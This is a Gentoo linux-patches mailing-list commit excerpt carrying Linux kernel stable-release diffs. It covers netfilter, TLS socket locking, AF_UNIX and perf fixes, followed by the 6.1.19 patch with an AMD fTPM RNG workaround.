+-	    ctnetlink_dump_mark(skb, ct) < 0 ||
++	    ctnetlink_dump_mark(skb, ct, true) < 0 ||
+ 	    ctnetlink_dump_secctx(skb, ct) < 0 ||
+ 	    ctnetlink_dump_id(skb, ct) < 0 ||
+ 	    ctnetlink_dump_use(skb, ct) < 0 ||
+@@ -831,8 +832,7 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
+ 	}
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	if (events & (1 << IPCT_MARK) &&
+-	    ctnetlink_dump_mark(skb, ct) < 0)
++	if (ctnetlink_dump_mark(skb, ct, events & (1 << IPCT_MARK)))
+ 		goto nla_put_failure;
+ #endif
+ 	nlmsg_end(skb, nlh);
+@@ -2735,7 +2735,7 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
+ 		goto nla_put_failure;
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	if (ctnetlink_dump_mark(skb, ct) < 0)
++	if (ctnetlink_dump_mark(skb, ct, true) < 0)
+ 		goto nla_put_failure;
+ #endif
+ 	if (ctnetlink_dump_labels(skb, ct) < 0)
+diff --git a/net/netfilter/nft_last.c b/net/netfilter/nft_last.c
+index bb15a55dad5c0..eaa54964cf23c 100644
+--- a/net/netfilter/nft_last.c
++++ b/net/netfilter/nft_last.c
+@@ -104,11 +104,15 @@ static void nft_last_destroy(const struct nft_ctx *ctx,
+ static int nft_last_clone(struct nft_expr *dst, const struct nft_expr *src)
+ {
+ 	struct nft_last_priv *priv_dst = nft_expr_priv(dst);
++	struct nft_last_priv *priv_src = nft_expr_priv(src);
+ 
+ 	priv_dst->last = kzalloc(sizeof(*priv_dst->last), GFP_ATOMIC);
+ 	if (!priv_dst->last)
+ 		return -ENOMEM;
+ 
++	priv_dst->last->set = priv_src->last->set;
++	priv_dst->last->jiffies = priv_src->last->jiffies;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/netfilter/nft_quota.c b/net/netfilter/nft_quota.c
+index e6b0df68feeaf..410a5fcf88309 100644
+--- a/net/netfilter/nft_quota.c
++++ b/net/netfilter/nft_quota.c
+@@ -235,12 +235,16 @@ static void nft_quota_destroy(const struct nft_ctx *ctx,
+ static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src)
+ {
+ 	struct nft_quota *priv_dst = nft_expr_priv(dst);
++	struct nft_quota *priv_src = nft_expr_priv(src);
++
++	priv_dst->quota = priv_src->quota;
++	priv_dst->flags = priv_src->flags;
+ 
+ 	priv_dst->consumed = kmalloc(sizeof(*priv_dst->consumed), GFP_ATOMIC);
+ 	if (!priv_dst->consumed)
+ 		return -ENOMEM;
+ 
+-	atomic64_set(priv_dst->consumed, 0);
++	*priv_dst->consumed = *priv_src->consumed;
+ 
+ 	return 0;
+ }
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 348bf561bc9fb..b9264e730fd93 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1446,8 +1446,8 @@ static int nfc_se_io(struct nfc_dev *dev, u32 se_idx,
+ 	return rc;
+ 
+ error:
+-	kfree(cb_context);
+ 	device_unlock(&dev->dev);
++	kfree(cb_context);
+ 	return rc;
+ }
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index d9413d43b1045..e8018b0fb7676 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -2644,16 +2644,14 @@ static int smc_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct smc_sock *smc;
+-	int rc = -EPIPE;
++	int rc;
+ 
+ 	smc = smc_sk(sk);
+ 	lock_sock(sk);
+-	if ((sk->sk_state != SMC_ACTIVE) &&
+-	    (sk->sk_state != SMC_APPCLOSEWAIT1) &&
+-	    (sk->sk_state != SMC_INIT))
+-		goto out;
+ 
++	/* SMC does not support connect with fastopen */
+ 	if (msg->msg_flags & MSG_FASTOPEN) {
++		/* not connected yet, fallback */
+ 		if (sk->sk_state == SMC_INIT && !smc->connect_nonblock) {
+ 			rc = smc_switch_to_fallback(smc, SMC_CLC_DECL_OPTUNSUPP);
+ 			if (rc)
+@@ -2662,6 +2660,11 @@ static int smc_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
++	} else if ((sk->sk_state != SMC_ACTIVE) &&
++		   (sk->sk_state != SMC_APPCLOSEWAIT1) &&
++		   (sk->sk_state != SMC_INIT)) {
++		rc = -EPIPE;
++		goto out;
+ 	}
+ 
+ 	if (smc->use_fallback) {
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 24577d1b99079..9ee32e06f877e 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -787,6 +787,7 @@ svc_start_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ static int
+ svc_stop_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ {
++	struct svc_rqst	*rqstp;
+ 	struct task_struct *task;
+ 	unsigned int state = serv->sv_nrthreads-1;
+ 
+@@ -795,7 +796,10 @@ svc_stop_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ 		task = choose_victim(serv, pool, &state);
+ 		if (task == NULL)
+ 			break;
+-		kthread_stop(task);
++		rqstp = kthread_data(task);
++		/* Did we lose a race to svo_function threadfn? */
++		if (kthread_stop(task) == -EINTR)
++			svc_exit_thread(rqstp);
+ 		nrservs++;
+ 	} while (nrservs < 0);
+ 	return 0;
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index 6c593788dc250..a7cc4f9faac28 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -508,6 +508,8 @@ handle_error:
+ 			zc_pfrag.offset = iter_offset.offset;
+ 			zc_pfrag.size = copy;
+ 			tls_append_frag(record, &zc_pfrag, copy);
++
++			iter_offset.offset += copy;
+ 		} else if (copy) {
+ 			copy = min_t(size_t, copy, pfrag->size - pfrag->offset);
+ 
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 3735cb00905df..b32c112984dd9 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -405,13 +405,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aes_gcm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_GCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_AES_GCM_128_IV_SIZE);
+ 		memcpy(crypto_info_aes_gcm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_GCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aes_gcm_128,
+ 				 sizeof(*crypto_info_aes_gcm_128)))
+@@ -429,13 +427,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aes_gcm_256->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_GCM_256_SALT_SIZE,
+ 		       TLS_CIPHER_AES_GCM_256_IV_SIZE);
+ 		memcpy(crypto_info_aes_gcm_256->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_GCM_256_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aes_gcm_256,
+ 				 sizeof(*crypto_info_aes_gcm_256)))
+@@ -451,13 +447,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(aes_ccm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_CCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_AES_CCM_128_IV_SIZE);
+ 		memcpy(aes_ccm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_CCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, aes_ccm_128, sizeof(*aes_ccm_128)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -472,13 +466,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(chacha20_poly1305->iv,
+ 		       cctx->iv + TLS_CIPHER_CHACHA20_POLY1305_SALT_SIZE,
+ 		       TLS_CIPHER_CHACHA20_POLY1305_IV_SIZE);
+ 		memcpy(chacha20_poly1305->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_CHACHA20_POLY1305_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, chacha20_poly1305,
+ 				sizeof(*chacha20_poly1305)))
+ 			rc = -EFAULT;
+@@ -493,13 +485,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(sm4_gcm_info->iv,
+ 		       cctx->iv + TLS_CIPHER_SM4_GCM_SALT_SIZE,
+ 		       TLS_CIPHER_SM4_GCM_IV_SIZE);
+ 		memcpy(sm4_gcm_info->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_SM4_GCM_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, sm4_gcm_info, sizeof(*sm4_gcm_info)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -513,13 +503,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(sm4_ccm_info->iv,
+ 		       cctx->iv + TLS_CIPHER_SM4_CCM_SALT_SIZE,
+ 		       TLS_CIPHER_SM4_CCM_IV_SIZE);
+ 		memcpy(sm4_ccm_info->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_SM4_CCM_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, sm4_ccm_info, sizeof(*sm4_ccm_info)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -535,13 +523,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aria_gcm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_ARIA_GCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_ARIA_GCM_128_IV_SIZE);
+ 		memcpy(crypto_info_aria_gcm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_ARIA_GCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aria_gcm_128,
+ 				 sizeof(*crypto_info_aria_gcm_128)))
+@@ -559,13 +545,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aria_gcm_256->iv,
+ 		       cctx->iv + TLS_CIPHER_ARIA_GCM_256_SALT_SIZE,
+ 		       TLS_CIPHER_ARIA_GCM_256_IV_SIZE);
+ 		memcpy(crypto_info_aria_gcm_256->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_ARIA_GCM_256_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aria_gcm_256,
+ 				 sizeof(*crypto_info_aria_gcm_256)))
+@@ -614,11 +598,9 @@ static int do_tls_getsockopt_no_pad(struct sock *sk, char __user *optval,
+ 	if (len < sizeof(value))
+ 		return -EINVAL;
+ 
+-	lock_sock(sk);
+ 	value = -EINVAL;
+ 	if (ctx->rx_conf == TLS_SW || ctx->rx_conf == TLS_HW)
+ 		value = ctx->rx_no_pad;
+-	release_sock(sk);
+ 	if (value < 0)
+ 		return value;
+ 
+@@ -635,6 +617,8 @@ static int do_tls_getsockopt(struct sock *sk, int optname,
+ {
+ 	int rc = 0;
+ 
++	lock_sock(sk);
++
+ 	switch (optname) {
+ 	case TLS_TX:
+ 	case TLS_RX:
+@@ -651,6 +635,9 @@ static int do_tls_getsockopt(struct sock *sk, int optname,
+ 		rc = -ENOPROTOOPT;
+ 		break;
+ 	}
++
++	release_sock(sk);
++
+ 	return rc;
+ }
+ 
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 38dcd9b401027..992092aeebad9 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -2114,7 +2114,7 @@ recv_end:
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek);
+-		decrypted = max(err, 0);
++		decrypted += max(err, 0);
+ 	}
+ 
+ 	copied += decrypted;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index f0c2293f1d3b8..7d17601ceee79 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2104,7 +2104,8 @@ out:
+ #define UNIX_SKB_FRAGS_SZ (PAGE_SIZE << get_order(32768))
+ 
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+-static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other)
++static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other,
++		     struct scm_cookie *scm, bool fds_sent)
+ {
+ 	struct unix_sock *ousk = unix_sk(other);
+ 	struct sk_buff *skb;
+@@ -2115,6 +2116,11 @@ static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other
+ 	if (!skb)
+ 		return err;
+ 
++	err = unix_scm_to_skb(scm, skb, !fds_sent);
++	if (err < 0) {
++		kfree_skb(skb);
++		return err;
++	}
+ 	skb_put(skb, 1);
+ 	err = skb_copy_datagram_from_iter(skb, 0, &msg->msg_iter, 1);
+ 
+@@ -2242,7 +2248,7 @@ static int unix_stream_sendmsg(struct socket *sock, struct msghdr *msg,
+ 
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+ 	if (msg->msg_flags & MSG_OOB) {
+-		err = queue_oob(sock, msg, other);
++		err = queue_oob(sock, msg, other, &scm, fds_sent);
+ 		if (err)
+ 			goto out_err;
+ 		sent++;
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index e9bf155139612..2f9d8271c6ec7 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -54,6 +54,9 @@ static int unix_bpf_recvmsg(struct sock *sk, struct msghdr *msg,
+ 	struct sk_psock *psock;
+ 	int copied;
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return __unix_recvmsg(sk, msg, len, flags);
+diff --git a/scripts/checkkconfigsymbols.py b/scripts/checkkconfigsymbols.py
+index 217d21abc86e8..36c920e713137 100755
+--- a/scripts/checkkconfigsymbols.py
++++ b/scripts/checkkconfigsymbols.py
+@@ -115,7 +115,7 @@ def parse_options():
+     return args
+ 
+ 
+-def main():
++def print_undefined_symbols():
+     """Main function of this module."""
+     args = parse_options()
+ 
+@@ -467,5 +467,16 @@ def parse_kconfig_file(kfile):
+     return defined, references
+ 
+ 
++def main():
++    try:
++        print_undefined_symbols()
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
++
++
+ if __name__ == "__main__":
+     main()
+diff --git a/scripts/clang-tools/run-clang-tools.py b/scripts/clang-tools/run-clang-tools.py
+index 56f2ec8f0f40a..3266708a86586 100755
+--- a/scripts/clang-tools/run-clang-tools.py
++++ b/scripts/clang-tools/run-clang-tools.py
+@@ -61,14 +61,21 @@ def run_analysis(entry):
+ 
+ 
+ def main():
+-    args = parse_arguments()
++    try:
++        args = parse_arguments()
+ 
+-    lock = multiprocessing.Lock()
+-    pool = multiprocessing.Pool(initializer=init, initargs=(lock, args))
+-    # Read JSON data into the datastore variable
+-    with open(args.path, "r") as f:
+-        datastore = json.load(f)
+-        pool.map(run_analysis, datastore)
++        lock = multiprocessing.Lock()
++        pool = multiprocessing.Pool(initializer=init, initargs=(lock, args))
++        # Read JSON data into the datastore variable
++        with open(args.path, "r") as f:
++            datastore = json.load(f)
++            pool.map(run_analysis, datastore)
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
+ 
+ 
+ if __name__ == "__main__":
+diff --git a/scripts/diffconfig b/scripts/diffconfig
+index d5da5fa05d1d3..43f0f3d273ae7 100755
+--- a/scripts/diffconfig
++++ b/scripts/diffconfig
+@@ -65,7 +65,7 @@ def print_config(op, config, value, new_value):
+         else:
+             print(" %s %s -> %s" % (config, value, new_value))
+ 
+-def main():
++def show_diff():
+     global merge_style
+ 
+     # parse command line args
+@@ -129,4 +129,16 @@ def main():
+     for config in new:
+         print_config("+", config, None, b[config])
+ 
+-main()
++def main():
++    try:
++        show_diff()
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
++
++
++if __name__ == '__main__':
++    main()
+diff --git a/tools/perf/builtin-inject.c b/tools/perf/builtin-inject.c
+index e2ce5f294cbd4..333d8941ce4de 100644
+--- a/tools/perf/builtin-inject.c
++++ b/tools/perf/builtin-inject.c
+@@ -538,6 +538,7 @@ static int perf_event__repipe_buildid_mmap2(struct perf_tool *tool,
+ 			dso->hit = 1;
+ 		}
+ 		dso__put(dso);
++		perf_event__repipe(tool, event, sample, machine);
+ 		return 0;
+ 	}
+ 
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index 978fdc60b4e84..f6427e3a47421 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -528,12 +528,7 @@ static int enable_counters(void)
+ 			return err;
+ 	}
+ 
+-	/*
+-	 * We need to enable counters only if:
+-	 * - we don't have tracee (attaching to task or cpu)
+-	 * - we have initial delay configured
+-	 */
+-	if (!target__none(&target)) {
++	if (!target__enable_on_exec(&target)) {
+ 		if (!all_counters_use_bpf)
+ 			evlist__enable(evsel_list);
+ 	}
+@@ -906,7 +901,7 @@ try_again_reset:
+ 			return err;
+ 	}
+ 
+-	if (stat_config.initial_delay) {
++	if (target.initial_delay) {
+ 		pr_info(EVLIST_DISABLED_MSG);
+ 	} else {
+ 		err = enable_counters();
+@@ -918,8 +913,8 @@ try_again_reset:
+ 	if (forks)
+ 		evlist__start_workload(evsel_list);
+ 
+-	if (stat_config.initial_delay > 0) {
+-		usleep(stat_config.initial_delay * USEC_PER_MSEC);
++	if (target.initial_delay > 0) {
++		usleep(target.initial_delay * USEC_PER_MSEC);
+ 		err = enable_counters();
+ 		if (err)
+ 			return -1;
+@@ -1243,7 +1238,7 @@ static struct option stat_options[] = {
+ 		     "aggregate counts per thread", AGGR_THREAD),
+ 	OPT_SET_UINT(0, "per-node", &stat_config.aggr_mode,
+ 		     "aggregate counts per numa node", AGGR_NODE),
+-	OPT_INTEGER('D', "delay", &stat_config.initial_delay,
++	OPT_INTEGER('D', "delay", &target.initial_delay,
+ 		    "ms to wait before starting measurement after program start (-1: start with events disabled)"),
+ 	OPT_CALLBACK_NOOPT(0, "metric-only", &stat_config.metric_only, NULL,
+ 			"Only print computed metrics. No raw values", enable_metric_only),
+diff --git a/tools/perf/util/stat.c b/tools/perf/util/stat.c
+index 8ec8bb4a99129..b63b3a3129919 100644
+--- a/tools/perf/util/stat.c
++++ b/tools/perf/util/stat.c
+@@ -583,11 +583,7 @@ int create_perf_stat_counter(struct evsel *evsel,
+ 	if (evsel__is_group_leader(evsel)) {
+ 		attr->disabled = 1;
+ 
+-		/*
+-		 * In case of initial_delay we enable tracee
+-		 * events manually.
+-		 */
+-		if (target__none(target) && !config->initial_delay)
++		if (target__enable_on_exec(target))
+ 			attr->enable_on_exec = 1;
+ 	}
+ 
+diff --git a/tools/perf/util/stat.h b/tools/perf/util/stat.h
+index 35c940d7f29cd..05c5125d7f419 100644
+--- a/tools/perf/util/stat.h
++++ b/tools/perf/util/stat.h
+@@ -145,7 +145,6 @@ struct perf_stat_config {
+ 	FILE			*output;
+ 	unsigned int		 interval;
+ 	unsigned int		 timeout;
+-	int			 initial_delay;
+ 	unsigned int		 unit_width;
+ 	unsigned int		 metric_only_len;
+ 	int			 times;
+diff --git a/tools/perf/util/target.h b/tools/perf/util/target.h
+index daec6cba500d4..880f1af7f6ad6 100644
+--- a/tools/perf/util/target.h
++++ b/tools/perf/util/target.h
+@@ -18,6 +18,7 @@ struct target {
+ 	bool	     per_thread;
+ 	bool	     use_bpf;
+ 	bool	     hybrid;
++	int	     initial_delay;
+ 	const char   *attr_map;
+ };
+ 
+@@ -72,6 +73,17 @@ static inline bool target__none(struct target *target)
+ 	return !target__has_task(target) && !target__has_cpu(target);
+ }
+ 
++static inline bool target__enable_on_exec(struct target *target)
++{
++	/*
++	 * Normally enable_on_exec should be set if:
++	 *  1) The tracee process is forked (not attaching to existed task or cpu).
++	 *  2) And initial_delay is not configured.
++	 * Otherwise, we enable tracee events manually.
++	 */
++	return target__none(target) && !target->initial_delay;
++}
++
+ static inline bool target__has_per_thread(struct target *target)
+ {
+ 	return target->system_wide && target->per_thread;
+diff --git a/tools/testing/selftests/netfilter/nft_nat.sh b/tools/testing/selftests/netfilter/nft_nat.sh
+index 924ecb3f1f737..dd40d9f6f2599 100755
+--- a/tools/testing/selftests/netfilter/nft_nat.sh
++++ b/tools/testing/selftests/netfilter/nft_nat.sh
+@@ -404,6 +404,8 @@ EOF
+ 	echo SERVER-$family | ip netns exec "$ns1" timeout 5 socat -u STDIN TCP-LISTEN:2000 &
+ 	sc_s=$!
+ 
++	sleep 1
++
+ 	result=$(ip netns exec "$ns0" timeout 1 socat TCP:$daddr:2000 STDOUT)
+ 
+ 	if [ "$result" = "SERVER-inet" ];then


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-13 11:30 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-03-13 11:30 UTC (permalink / raw
  To: gentoo-commits

commit:     dc5364316903f1ae5699ba6756944fdb1d6a2dde
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Mon Mar 13 10:45:23 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Mon Mar 13 10:45:23 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=dc536431

Linux patch 6.1.19

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |   4 +
 1018_linux-6.1.19.patch | 264 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 268 insertions(+)

diff --git a/0000_README b/0000_README
index e3d2c14c..3728b6a9 100644
--- a/0000_README
+++ b/0000_README
@@ -115,6 +115,10 @@ Patch:  1017_linux-6.1.18.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.18
 
+Patch:  1018_linux-6.1.19.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.19
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1018_linux-6.1.19.patch b/1018_linux-6.1.19.patch
new file mode 100644
index 00000000..617404d5
--- /dev/null
+++ b/1018_linux-6.1.19.patch
@@ -0,0 +1,264 @@
+diff --git a/Makefile b/Makefile
+index a825361f71625..ea18c4c20738c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 18
++SUBLEVEL = 19
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 783d65fc71f07..409682d063098 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -507,6 +507,63 @@ static int tpm_add_legacy_sysfs(struct tpm_chip *chip)
+ 	return 0;
+ }
+ 
++/*
++ * Some AMD fTPM versions may cause stutter
++ * https://www.amd.com/en/support/kb/faq/pa-410
++ *
++ * Fixes are available in two series of fTPM firmware:
++ * 6.x.y.z series: 6.0.18.6 +
++ * 3.x.y.z series: 3.57.y.5 +
++ */
++static bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
++{
++	u32 val1, val2;
++	u64 version;
++	int ret;
++
++	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
++		return false;
++
++	ret = tpm_request_locality(chip);
++	if (ret)
++		return false;
++
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val1, NULL);
++	if (ret)
++		goto release;
++	if (val1 != 0x414D4400U /* AMD */) {
++		ret = -ENODEV;
++		goto release;
++	}
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_1, &val1, NULL);
++	if (ret)
++		goto release;
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_2, &val2, NULL);
++
++release:
++	tpm_relinquish_locality(chip);
++
++	if (ret)
++		return false;
++
++	version = ((u64)val1 << 32) | val2;
++	if ((version >> 48) == 6) {
++		if (version >= 0x0006000000180006ULL)
++			return false;
++	} else if ((version >> 48) == 3) {
++		if (version >= 0x0003005700000005ULL)
++			return false;
++	} else {
++		return false;
++	}
++
++	dev_warn(&chip->dev,
++		 "AMD fTPM version 0x%llx causes system stutter; hwrng disabled\n",
++		 version);
++
++	return true;
++}
++
+ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	struct tpm_chip *chip = container_of(rng, struct tpm_chip, hwrng);
+@@ -516,7 +573,8 @@ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ 
+ static int tpm_add_hwrng(struct tpm_chip *chip)
+ {
+-	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip))
++	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip) ||
++	    tpm_amd_is_rng_defective(chip))
+ 		return 0;
+ 
+ 	snprintf(chip->hwrng_name, sizeof(chip->hwrng_name),
+diff --git a/drivers/char/tpm/tpm.h b/drivers/char/tpm/tpm.h
+index 24ee4e1cc452a..830014a266090 100644
+--- a/drivers/char/tpm/tpm.h
++++ b/drivers/char/tpm/tpm.h
+@@ -150,6 +150,79 @@ enum tpm_sub_capabilities {
+ 	TPM_CAP_PROP_TIS_DURATION = 0x120,
+ };
+ 
++enum tpm2_pt_props {
++	TPM2_PT_NONE = 0x00000000,
++	TPM2_PT_GROUP = 0x00000100,
++	TPM2_PT_FIXED = TPM2_PT_GROUP * 1,
++	TPM2_PT_FAMILY_INDICATOR = TPM2_PT_FIXED + 0,
++	TPM2_PT_LEVEL = TPM2_PT_FIXED + 1,
++	TPM2_PT_REVISION = TPM2_PT_FIXED + 2,
++	TPM2_PT_DAY_OF_YEAR = TPM2_PT_FIXED + 3,
++	TPM2_PT_YEAR = TPM2_PT_FIXED + 4,
++	TPM2_PT_MANUFACTURER = TPM2_PT_FIXED + 5,
++	TPM2_PT_VENDOR_STRING_1 = TPM2_PT_FIXED + 6,
++	TPM2_PT_VENDOR_STRING_2 = TPM2_PT_FIXED + 7,
++	TPM2_PT_VENDOR_STRING_3 = TPM2_PT_FIXED + 8,
++	TPM2_PT_VENDOR_STRING_4 = TPM2_PT_FIXED + 9,
++	TPM2_PT_VENDOR_TPM_TYPE = TPM2_PT_FIXED + 10,
++	TPM2_PT_FIRMWARE_VERSION_1 = TPM2_PT_FIXED + 11,
++	TPM2_PT_FIRMWARE_VERSION_2 = TPM2_PT_FIXED + 12,
++	TPM2_PT_INPUT_BUFFER = TPM2_PT_FIXED + 13,
++	TPM2_PT_HR_TRANSIENT_MIN = TPM2_PT_FIXED + 14,
++	TPM2_PT_HR_PERSISTENT_MIN = TPM2_PT_FIXED + 15,
++	TPM2_PT_HR_LOADED_MIN = TPM2_PT_FIXED + 16,
++	TPM2_PT_ACTIVE_SESSIONS_MAX = TPM2_PT_FIXED + 17,
++	TPM2_PT_PCR_COUNT = TPM2_PT_FIXED + 18,
++	TPM2_PT_PCR_SELECT_MIN = TPM2_PT_FIXED + 19,
++	TPM2_PT_CONTEXT_GAP_MAX = TPM2_PT_FIXED + 20,
++	TPM2_PT_NV_COUNTERS_MAX = TPM2_PT_FIXED + 22,
++	TPM2_PT_NV_INDEX_MAX = TPM2_PT_FIXED + 23,
++	TPM2_PT_MEMORY = TPM2_PT_FIXED + 24,
++	TPM2_PT_CLOCK_UPDATE = TPM2_PT_FIXED + 25,
